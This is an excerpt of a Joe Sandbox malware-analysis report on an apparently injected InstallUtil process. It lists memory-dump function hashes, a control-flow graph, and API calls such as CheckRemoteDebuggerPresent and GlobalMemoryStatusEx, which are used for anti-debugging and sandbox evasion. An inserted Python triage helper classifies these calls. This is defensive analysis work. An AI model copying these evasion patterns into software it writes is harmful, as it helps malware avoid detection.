                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $cq$$cq$$cq
                                                  • API String ID: 0-2085107096
                                                  • Opcode ID: 8ef7f18c8740cc7d56a6662ab1627aef8a1808477c7400a2b591490650ad4660
                                                  • Instruction ID: 2c7ae8917e180aff2175b54cce1f1dc6eda91c5072b52b3964231e83b23dc7c7
                                                  • Opcode Fuzzy Hash: 8ef7f18c8740cc7d56a6662ab1627aef8a1808477c7400a2b591490650ad4660
                                                  • Instruction Fuzzy Hash: 34624D30A00606CFDF55EF68E590A5EB7B2FF84304B608A69E4059F369DB75ED46CB80

                                                  Control-flow Graph

                                                  • Rendered control-flow graph omitted; its basic blocks were marked Executed / Not Executed
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: fhq$XPhq$\Ohq
                                                  • API String ID: 0-1165799323
                                                  • Opcode ID: 5a5f1dc71b24586db618a4997db44b27efe788397462a89720ccec5f5c6892ac
                                                  • Instruction ID: 0597eec98544c8be1008fe829afaa1305f0acfc6dc780229d005fd1d8239fa7c
                                                  • Opcode Fuzzy Hash: 5a5f1dc71b24586db618a4997db44b27efe788397462a89720ccec5f5c6892ac
                                                  • Instruction Fuzzy Hash: F8615C31F002199FEF549FA5C9547AEBAF6FB88300F20842AE10AAB3D5DF714D058B91

                                                  Control-flow Graph

                                                  • Rendered control-flow graph omitted; its basic blocks were marked Executed / Not Executed
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $cq$$cq
                                                  • API String ID: 0-2695052418
                                                  • Opcode ID: 16e40145f901578a7b960890de7efef2e5cc46b4001fc767d49e94663e25a981
                                                  • Instruction ID: bf5e67594385d7074a924b854c9fdbc94d5b10e073307d2ee6b6b5a558498c06
                                                  • Opcode Fuzzy Hash: 16e40145f901578a7b960890de7efef2e5cc46b4001fc767d49e94663e25a981
                                                  • Instruction Fuzzy Hash: 19515E34B001059FEF55EB78D9607AF77B6EBC4200F148969D80ADB399EB719C428B91

Control-flow Graph (edge list extracted from the interactive graph: each node is an id followed by its basic-block address range, a->b is a successor edge, and "call" names a call target; the executed / not-executed colouring of the original graph does not survive extraction)
                                                  control_flow_graph 3008 60ff218-60ff237 3009 60ff239-60ff246 call 60fe15c 3008->3009 3010 60ff263-60ff267 3008->3010 3017 60ff25c 3009->3017 3018 60ff248 3009->3018 3011 60ff27b-60ff2bc 3010->3011 3012 60ff269-60ff273 3010->3012 3019 60ff2be-60ff2c6 3011->3019 3020 60ff2c9-60ff2d7 3011->3020 3012->3011 3017->3010 3066 60ff24e call 60ff4b0 3018->3066 3067 60ff24e call 60ff4c0 3018->3067 3019->3020 3022 60ff2fb-60ff2fd 3020->3022 3023 60ff2d9-60ff2de 3020->3023 3021 60ff254-60ff256 3021->3017 3024 60ff398-60ff410 3021->3024 3025 60ff300-60ff307 3022->3025 3026 60ff2e9 3023->3026 3027 60ff2e0-60ff2e7 call 60fe168 3023->3027 3058 60ff454-60ff458 3024->3058 3059 60ff412-60ff451 3024->3059 3029 60ff309-60ff311 3025->3029 3030 60ff314-60ff31b 3025->3030 3028 60ff2eb-60ff2f9 3026->3028 3027->3028 3028->3025 3029->3030 3032 60ff31d-60ff325 3030->3032 3033 60ff328-60ff331 call 60f799c 3030->3033 3032->3033 3039 60ff33e-60ff343 3033->3039 3040 60ff333-60ff33b 3033->3040 3041 60ff345-60ff34c 3039->3041 3042 60ff361-60ff36e 3039->3042 3040->3039 3041->3042 3044 60ff34e-60ff35e call 60fdfd8 call 60fe178 3041->3044 3048 60ff391-60ff397 3042->3048 3049 60ff370-60ff38e 3042->3049 3044->3042 3049->3048 3060 60ff45a-60ff45d 3058->3060 3061 60ff460-60ff48b GetModuleHandleW 3058->3061 3059->3058 3060->3061 3063 60ff48d-60ff493 3061->3063 3064 60ff494-60ff4a8 3061->3064 3063->3064 3066->3021 3067->3021
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 060FF47E
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332603917.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_60f0000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: bdd577adf1127dfcea2d001cadeb1f271fc4bc9b764585f31c016f80402f61f5
                                                  • Instruction ID: b0dbcd2f6d4407e36c2677a75abdabdec5574f447df80392374f38866263bbb5
                                                  • Opcode Fuzzy Hash: bdd577adf1127dfcea2d001cadeb1f271fc4bc9b764585f31c016f80402f61f5
                                                  • Instruction Fuzzy Hash: E6815670A10B469FD7A4DF2AD44079ABBF1FF88304F00892ED586DBA50DB75E845CB91
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3315392519.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_bc0000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b6e9596a1deb81bf4bbda3cd34b7a0dc58cd0567c74e2168cf43e7d97ec5b80c
                                                  • Instruction ID: cc7d4b31f2855894457a4f8780e162502a3babd341dfabe574948ffa8fa73e10
                                                  • Opcode Fuzzy Hash: b6e9596a1deb81bf4bbda3cd34b7a0dc58cd0567c74e2168cf43e7d97ec5b80c
                                                  • Instruction Fuzzy Hash: D7414572D0439A8FCB10CFA9D8046DEBBF1EF85320F1486ABD444E7281D7789844CB91
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 060F70E7
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332603917.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_60f0000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 93e232db68c22736cc0e874bdf07eee2d3f50cd5d7855077e3068636f575c905
                                                  • Instruction ID: cac1fb6757813bd0a1cefc1ca9bb0f9f249237a48da3d233fdf9db380e6f22ff
                                                  • Opcode Fuzzy Hash: 93e232db68c22736cc0e874bdf07eee2d3f50cd5d7855077e3068636f575c905
                                                  • Instruction Fuzzy Hash: 1B2105B5900249EFDB10CFAAD984ADEFFF8EB48310F14841AE914A3350D375A940CFA1
                                                  APIs
                                                  • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00BC7127
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3315392519.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_bc0000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID: CheckDebuggerPresentRemote
                                                  • String ID:
                                                  • API String ID: 3662101638-0
                                                  • Opcode ID: c5a7d219da5df30c79ed74936cd143121d66b968d676261aae43e6e723cca1c7
                                                  • Instruction ID: 747b78b1cd4d36aaf9a844e990947ed2a77a0e7abfafc9725974e72b50b00b59
                                                  • Opcode Fuzzy Hash: c5a7d219da5df30c79ed74936cd143121d66b968d676261aae43e6e723cca1c7
                                                  • Instruction Fuzzy Hash: 222105B68002598FCB10CF9AD984BEEBBF5EF49310F29845AE455B7350D7789944CF60
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 060F70E7
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332603917.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_60f0000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: e461b606e0d7b847316f89ccf96b802cec7b6ae186c49c119748604dc42c0b67
                                                  • Instruction ID: 3f6322377ba29354d75460fc99f6062fc52e5b5f09ed25331a3f9e41bf4cc657
                                                  • Opcode Fuzzy Hash: e461b606e0d7b847316f89ccf96b802cec7b6ae186c49c119748604dc42c0b67
                                                  • Instruction Fuzzy Hash: 3021C2B5910249DFDB10CFAAD984ADEFFF8EB48320F14841AE918A3350D375A944DFA5
                                                  APIs
                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,060FF4F9,00000800,00000000,00000000), ref: 060FF6EA
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332603917.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_60f0000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: 660c12de998c0a5c60b7315740cdf9c4d1268329ba14a01e1101bf961d23a718
                                                  • Instruction ID: e5f9fbc5a144e80a5d45054ad4eb964bf99b78dd26b24bdbbe4526750071c6eb
                                                  • Opcode Fuzzy Hash: 660c12de998c0a5c60b7315740cdf9c4d1268329ba14a01e1101bf961d23a718
                                                  • Instruction Fuzzy Hash: 362114B6C002099FDB10CF9AD884ADEFBF8FB48320F10841AE919A7610C775A945CFA5
                                                  APIs
                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,060FF4F9,00000800,00000000,00000000), ref: 060FF6EA
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332603917.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_60f0000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: a36b515087eb8a51bed7aac9c57d14a65e0f15dac46ddbac1a0ad1520c350f16
                                                  • Instruction ID: b2448ce14aaeebdc2bdfeaf8998696e40aee5a8dc874628bb62af572c981cfe8
                                                  • Opcode Fuzzy Hash: a36b515087eb8a51bed7aac9c57d14a65e0f15dac46ddbac1a0ad1520c350f16
                                                  • Instruction Fuzzy Hash: 2B1103B68002499FDB20CF9AD844A9EFBF8EB48310F10842AE919A7610C775A545CFA5
                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNELBASE ref: 00BCF3F7
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3315392519.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_bc0000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus
                                                  • String ID:
                                                  • API String ID: 1890195054-0
                                                  • Opcode ID: 94e6b064b016412b4c7cc66b6f86dcacbe20954185d9ae7556baefc0a7e677e4
                                                  • Instruction ID: 0ec9937ee7430970e9c83179a1ae38fe4e2af5d0e869c0df3a2b98be7bc43884
                                                  • Opcode Fuzzy Hash: 94e6b064b016412b4c7cc66b6f86dcacbe20954185d9ae7556baefc0a7e677e4
                                                  • Instruction Fuzzy Hash: 6011F6B1C0065A9FCB10CF9AD944BDEFBF4EF48320F14816AD918A7241D778A944CFA5
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 060FF47E
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332603917.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_60f0000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: 25169350e31c9436eb8943fe5a09e6d9818d6f6b5e4b2d478f644b18d44763be
                                                  • Instruction ID: 50473c1aa08573cb68a218cbeb6c65fe794afa65bf9da09bd6d8319b4f079466
                                                  • Opcode Fuzzy Hash: 25169350e31c9436eb8943fe5a09e6d9818d6f6b5e4b2d478f644b18d44763be
                                                  • Instruction Fuzzy Hash: B411E0B6C007498FCB20CF9AD944ADEFBF8EB88324F14841AD919A7750D379A545CFA1
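The "APIs" lines in the blocks above are the machine-readable part of this listing: CheckRemoteDebuggerPresent and GlobalMemoryStatusEx sit in the 0x00BC0000 dump of process 8, while GetModuleHandleW, LoadLibraryExW and DuplicateHandle sit in the 0x060F0000 dump of the same process, and two separate function summaries point at the same DuplicateHandle call site (ref 060F70E7). The following Python helper is an added example, not Joe Sandbox code; it parses such entries, binds each call site to the memory-dump region it was found in, de-duplicates call sites and groups them by technique. The technique table, the `REGION_WINDOW` plausibility bound and the sample input (a constructed subset of the lines on this page) are the editor's assumptions.

```python
"""Triage helper for the per-function "APIs" entries of a Joe Sandbox
disassembly listing (added example; the category table is an assumption)."""
import re
from collections import defaultdict

# Constructed subset of this report's listing for process 8 (InstallUtil),
# copied from the page; the DuplicateHandle call site appears twice on purpose.
SAMPLE_LISTING = """\
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 060FF47E
Memory Dump Source
• Source File: 00000008.00000002.3332603917.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 060F70E7
Memory Dump Source
• Source File: 00000008.00000002.3332603917.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
APIs
• CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00BC7127
Memory Dump Source
• Source File: 00000008.00000002.3315392519.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 060F70E7
Memory Dump Source
• Source File: 00000008.00000002.3332603917.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
APIs
• LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,060FF4F9,00000800,00000000,00000000), ref: 060FF6EA
Memory Dump Source
• Source File: 00000008.00000002.3332603917.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
APIs
• GlobalMemoryStatusEx.KERNELBASE ref: 00BCF3F7
Memory Dump Source
• Source File: 00000008.00000002.3315392519.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false
"""

# "• Api.MODULE(args), ref: ADDR"; the argument list and its comma are optional
# (GlobalMemoryStatusEx is listed without one on this page).
API_RE = re.compile(
    r"^•\s*(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# "• Source File: PID.xxx.xxx.BASE....sdmp, Offset: BASE, ..." binds the
# preceding API lines to one dumped region.
SOURCE_RE = re.compile(
    r"^•\s*Source File:\s*(?P<pid>\d+)\..*?Offset:\s*(?P<base>[0-9A-Fa-f]+)"
)

# Editor's mapping of APIs to the technique they usually serve (assumption).
API_CATEGORIES = {
    "CheckRemoteDebuggerPresent": "anti-debug",
    "IsDebuggerPresent": "anti-debug",
    "GlobalMemoryStatusEx": "sandbox-heuristics",   # RAM-size checks
    "GetSystemInfo": "sandbox-heuristics",          # CPU-count checks
    "LoadLibraryExW": "dynamic-loading",
    "LoadLibraryW": "dynamic-loading",
    "GetModuleHandleW": "dynamic-loading",
    "GetProcAddress": "dynamic-loading",
    "DuplicateHandle": "handle-manipulation",
}
REGION_WINDOW = 0x100000  # assumed upper bound on a dumped region's size


def classify(api):
    return API_CATEGORIES.get(api, "other")


def parse_listing(text):
    """Return one dict per API line, tagged with the pid and region base of
    the Memory Dump Source block that follows it."""
    entries, pending = [], []
    for line in text.splitlines():
        line = line.strip()
        m = API_RE.match(line)
        if m:
            pending.append(m.groupdict())
            continue
        m = SOURCE_RE.match(line)
        if m and pending:
            for p in pending:
                entries.append({**p, "pid": int(m["pid"]), "base": m["base"].upper()})
            pending = []
    return entries


def summarize(entries):
    """{region base: {category: sorted unique (api, call site)}}; the set
    collapses call sites reached from several function summaries."""
    grouped = defaultdict(lambda: defaultdict(set))
    for e in entries:
        grouped[e["base"]][classify(e["api"])].add((e["api"], e["ref"].upper()))
    return {b: {c: sorted(s) for c, s in cats.items()} for b, cats in grouped.items()}


def misattributed(entries):
    """Call sites that do not fall inside the region they were attributed to."""
    bad = []
    for e in entries:
        delta = int(e["ref"], 16) - int(e["base"], 16)
        if not 0 <= delta < REGION_WINDOW:
            bad.append((e["api"], e["ref"], e["base"]))
    return bad


if __name__ == "__main__":
    parsed = parse_listing(SAMPLE_LISTING)
    for base, cats in sorted(summarize(parsed).items()):
        print(f"region {base}:")
        for cat, sites in sorted(cats.items()):
            print(f"  {cat}: {', '.join(f'{a}@{r}' for a, r in sites)}")
    print("misattributed:", misattributed(parsed))
```

Run over the real listing, the summary separates the two injected regions by role: the 0x00BC0000 dump carries the anti-debug and sandbox-heuristic calls, the 0x060F0000 dump carries the loader-style calls (GetModuleHandleW, LoadLibraryExW) and the DuplicateHandle call. The `misattributed` check catches entries whose call site lies outside the region named in the Source File line, which is the usual symptom of a mis-pasted or mis-parsed block.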
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: XPhq
                                                  • API String ID: 0-3379001060
                                                  • Opcode ID: 91baa0ec86f4591b4097231d4198111df5ef4c08f10903b26cc0cf6ff6a1a9aa
                                                  • Instruction ID: 524b530104d2bd73028167b54ad06e0a43cbcaca1e041e858da668e88fcbb336
                                                  • Opcode Fuzzy Hash: 91baa0ec86f4591b4097231d4198111df5ef4c08f10903b26cc0cf6ff6a1a9aa
                                                  • Instruction Fuzzy Hash: 73414D75F002099FEF45DFE5C954BAEBAF6EF88300F20852AE106AB395DB715C058B91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PHcq
                                                  • API String ID: 0-4245845256
                                                  • Opcode ID: 23fcac3b5071bda4ab8cce9b551e5cf3d8d238e894cd509d30b26d11c713b6e1
                                                  • Instruction ID: c701ce969c847b77ccbbf88dde43781538b45d0e6d7bea33f569000a461c8a9c
                                                  • Opcode Fuzzy Hash: 23fcac3b5071bda4ab8cce9b551e5cf3d8d238e894cd509d30b26d11c713b6e1
                                                  • Instruction Fuzzy Hash: D1418270E007499FEF15DFB4D9546AEBBB2FF85300F104929E406EB291EBB09946CB81
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PHcq
                                                  • API String ID: 0-4245845256
                                                  • Opcode ID: c80ebc6056524a1947bc6b51fc54943cb2c8205d34b65e5de8041f0cdecd63f9
                                                  • Instruction ID: d425d1be896026c01b6970e17e690ce67c5adabeadc3bd6ecd06afccdfd659ba
                                                  • Opcode Fuzzy Hash: c80ebc6056524a1947bc6b51fc54943cb2c8205d34b65e5de8041f0cdecd63f9
                                                  • Instruction Fuzzy Hash: 51415170E006499BEF55DFE5D9547AEBBB2FF85300F104929E406EB284DFB0A942CB81
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PHcq
                                                  • API String ID: 0-4245845256
                                                  • Opcode ID: 82a81ba5805e362d98e743d09aa3301221fbde711b9bfdb742673c867fe0d5d1
                                                  • Instruction ID: b7773f360d3979483a6c851bd3932371f8463cc285b4d8811d171cd956eb0f6a
                                                  • Opcode Fuzzy Hash: 82a81ba5805e362d98e743d09aa3301221fbde711b9bfdb742673c867fe0d5d1
                                                  • Instruction Fuzzy Hash: E431DD31B002058FEF59ABB4C95876F7BA2AF89200F144969D406DB3D2DF74DE06CB91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PHcq
                                                  • API String ID: 0-4245845256
                                                  • Opcode ID: 9c98310e1f653f3d709417f0291f9d115bc2b4352378c216b8eaa74b1c405ebd
                                                  • Instruction ID: 51810f1d982780db19175a521e39b8a0646668f86cbf97e62984c822f6abe276
                                                  • Opcode Fuzzy Hash: 9c98310e1f653f3d709417f0291f9d115bc2b4352378c216b8eaa74b1c405ebd
                                                  • Instruction Fuzzy Hash: DC31F030B002058FEF59ABB4C95866F7BA2EFC8200B644829D406DB396DF71DE46CB91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: \Ohq
                                                  • API String ID: 0-1367279102
                                                  • Opcode ID: 1888f9d51699d7c5f53648542f16e06c5e423b115b40ecc60f720b68007e0488
                                                  • Instruction ID: 258eaed47adfd6f1daa0afb843a1722de8811a08dba1b633d977f2143e472ba7
                                                  • Opcode Fuzzy Hash: 1888f9d51699d7c5f53648542f16e06c5e423b115b40ecc60f720b68007e0488
                                                  • Instruction Fuzzy Hash: 53F0FE30A20119DFEF54DF94E999BADBBB2FF88700F204519E502A7294CBB45C45CBC0
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9e809273fb28f06e30f38f979c0ade5e0b7595793e15f1dda8612656b76b0bfa
                                                  • Instruction ID: 531b25f216912a6153e98ecf1203dfca6cd52058d04a9d2c828456fc4f5a2fca
                                                  • Opcode Fuzzy Hash: 9e809273fb28f06e30f38f979c0ade5e0b7595793e15f1dda8612656b76b0bfa
                                                  • Instruction Fuzzy Hash: BDA1C474F141098BFF60CB6CD5907AEB6B6EB89300F60842AE409E73D5CB76CD818792
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6302b9abea881b5e0388879137c1926bd5745d9b66fb00782fa81933f6e610e5
                                                  • Instruction ID: 5cfd50d85968e7d396aff87ae6b0321ddbef0d76653aaaea95b1047b957fa6a0
                                                  • Opcode Fuzzy Hash: 6302b9abea881b5e0388879137c1926bd5745d9b66fb00782fa81933f6e610e5
                                                  • Instruction Fuzzy Hash: B961B2B1F100114FDF559A6EC84466FBAEBAFC4220B554439E40EDB364DEBADC028BD1
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e26088772a6452f4f377dc0ea6292a979b5b95c524c5df18db1dd6e00c2cc45b
                                                  • Instruction ID: ac72bbe5de36cb33e20daa70affd10cef5b2838737ba0b0f22cff19e4db12452
                                                  • Opcode Fuzzy Hash: e26088772a6452f4f377dc0ea6292a979b5b95c524c5df18db1dd6e00c2cc45b
                                                  • Instruction Fuzzy Hash: 7C812D34B102068BEF54DFA8D5947AEB7F6AFC4300F108429D50AEB399DB75DC468B51
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9bc2508665a47c1a4e94b888156206ff87a7b09020cb36fd1a59dd405e6c5f83
                                                  • Instruction ID: 27c69e197e79c5708b5e04137ba886b22b8aa5c959d9e20855c658f17416ee27
                                                  • Opcode Fuzzy Hash: 9bc2508665a47c1a4e94b888156206ff87a7b09020cb36fd1a59dd405e6c5f83
                                                  • Instruction Fuzzy Hash: AF914E74E006198BDF60DF68C880B9DB7B1FF89310F208699D549BB395DB70AA85CF91
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 54fa97020030de7b909734f80c8794c59f21e5dae3b4f4335b6719c3c8f09efb
                                                  • Instruction ID: 31b6e85b9bf80624bcbc62934a755cc3f86a3e10abc5f704bbcc6d9801a48e72
                                                  • Opcode Fuzzy Hash: 54fa97020030de7b909734f80c8794c59f21e5dae3b4f4335b6719c3c8f09efb
                                                  • Instruction Fuzzy Hash: B8812D34B102058BEF54DBB8D5947AEB7F6AFC4300F108429D50AEB399DB75DC428B51
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Instruction Fuzzy Hash: 6001F431F182098BEF249A68D55079EBBB9EB45320F10483BE41ADB380D772DC058791
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 72265b1c6b29f4964f67dce4521d8d241f7fd019fda1cf27824598b4c818d0da
                                                  • Instruction ID: 82f6da100d5b322ef21cf631b37b345256d1eadda6e284042cf7045ffb6bf49e
                                                  • Opcode Fuzzy Hash: 72265b1c6b29f4964f67dce4521d8d241f7fd019fda1cf27824598b4c818d0da
                                                  • Instruction Fuzzy Hash: 70F0A732F202249BDF14A965DC0099AB37AE784750F104539ED01FB384DB716C058BC0
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.3332748207.0000000006100000.00000040.00000800.00020000.00000000.sdmp, Offset: 06100000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_6100000_InstallUtil.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dfe8378eaf0684697b1b8c07938968948ba83d7fa7830b6097087b48adc47bf5
                                                  • Instruction ID: 793c8f81fbc3428494755e57588e35ad691fad1457928c2ad3d6788e7abc15fc
